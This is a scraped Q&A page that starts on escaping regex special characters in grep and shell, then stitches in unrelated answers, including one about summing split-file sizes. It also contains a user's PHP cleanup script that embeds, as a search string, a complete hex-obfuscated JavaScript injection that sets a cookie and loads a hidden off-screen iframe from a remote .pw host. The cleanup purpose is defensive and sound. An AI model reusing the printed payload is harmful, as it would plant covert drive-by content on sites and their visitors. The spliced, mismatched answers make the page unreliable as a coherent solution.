“grep: Unmatched [” error when using regex

grepquotingregular expression

I'm trying to find a pattern similar to this:

tail -n 100000 gateway.log | grep -B10 -A10 'Nov 22 11:13:56 Received Packet from [10.50.98.68'

Where "11:13:56" could be any time.

This is what I came up with:

tail -n 100000 gateway.log | grep -B10 -A10 'Nov 22 [0-9]:[0-9]:[0-9] Received Packet from [10.50.98.68'

I'm not sure what it is referring to when it says "unmatched [". This part "[0-9]:[0-9]:[0-9]" is supposed to be regex. This part "[10.50.98.68" is supposed to be a string.

Best Answer

In a grep regular expression, [ is a special character. For a literal [, you need to backslash escape it, like so: \[.

Note that the entirety of Nov 22 [0-9]: ... [10.50.98.68 is a regular expression. You can't just point to it and say "this part is a regex, this part should be a literal string" and expect grep to be able to read your thoughts. That's why you need to escape any special characters that are part of literal strings you want to match.

Unrelated, but each occurrence of [0-9] in your regular expression only matches a single character. Also, . is a special character that will need to be escaped as well. You probably want something like the following for your regular expression:

^Nov 22 [0-9][0-9]:[0-9][0-9]:[0-9][0-9] Received Packet from \[10\.50\.98\.68

How to quote special characters (portably)

The following snippet adds a backslash before each character that's special in extended regular expressions, using sed to replace any occurence of one of the characters ][()\.^$?*+ by a backslash followed by that character:

raw_string='test[string]\.wibble'
quoted_string=$(printf %s "$raw_string" | sed 's/[][()\.^$?*+]/\\&/g')

This will remove trailing newlines in $raw_string; if that's a problem, ensure that the string doesn't end with a newline by adding an inert character at the end, then strip off that character.

quoted_string=$(printf %sa "$raw_string" | sed 's/[][()\.^$?*+]/\\&/g')
quoted_string=${quoted_string%?}

How to quote special characters (in bash or zsh)

Bash and zsh have a pattern replacement feature, which can be faster if the string is not very long. It's cumbersome here because the replacement must be a string, so each character needs to be replaced separately. Note that you must escape the backslashes first.

quoted_string=${raw_string//\\//\\\\}
for c in \[ \] \( \) \. \^ \$ \? \* \+; do
  quoted_string=${quoted_string//"$c"/"\\$c"}
done

How to quote special characters (in ksh93)

Ksh's string replacement construct is more powerful than the watered-down version in bash and zsh. It supports references to groups in the pattern.

quoted_string=${raw_string//@([][()\.^$?*+])/\\\1}

What you actually want

You don't need find here: shell patterns are sufficient to match files ending with three digits. If no part file exists, the glob pattern is left unexpanded. There's also a simpler way of adding the file sizes: rather than use stat (which exists on many unix variants but has a different syntax on each) and do complex pipelining to sum the values, you can call wc -c (on regular files, on most systems, wc will look at the file size and not bother to open the file and read the bytes).

set -- "$DESTINATION/$FILE_BASENAME".[0-9][0-9][0-9]
case $1 in
  *\]) # The glob was left intact, so no part exists
    do_split …;;
  *) # The glob was expanded, so at least one part exists
    FILE_SIZE_EXISTING=$(wc -c "$@" | sed -n '$s/[^0-9]//gp')
    if [ "$FILE_SIZE_EXISTING" -ne "$(wc -c <"$DESTINATION/$FILE_BASENAME")" ]; then
      do_split …
    fi

Note that your test on the total size is not very reliable: if the file has changed but remained the same size, you'll end up with stale parts. That's ok if the files never change and the only risk is that parts may be truncated or missing.

Bash – Problems with regex in grep

Since I'm more familiar with php, I ended up with this:

#! /opt/php56/bin/php
<?php

$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = preg_replace("/(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)/", '', $filecontents);      
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("grep count: $count") . PHP_EOL;

I think the grep part could be optimized with a regular expression too, something like this:

fgrep -rl '(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)' .

But I dint' try it, so I don't know for sure.

A better way to recover from this kind of malware would be to use a backup, but In my case this wasn't possible, so I opted for the search/replace strategy.

Thanks for all the help !!

Best Answer

Related Solutions

Escaping of meta characters in basic/extended posix regex strings in grep

How to quote special characters (portably)

How to quote special characters (in bash or zsh)

How to quote special characters (in ksh93)

What you actually want

Bash – Problems with regex in grep

Related Question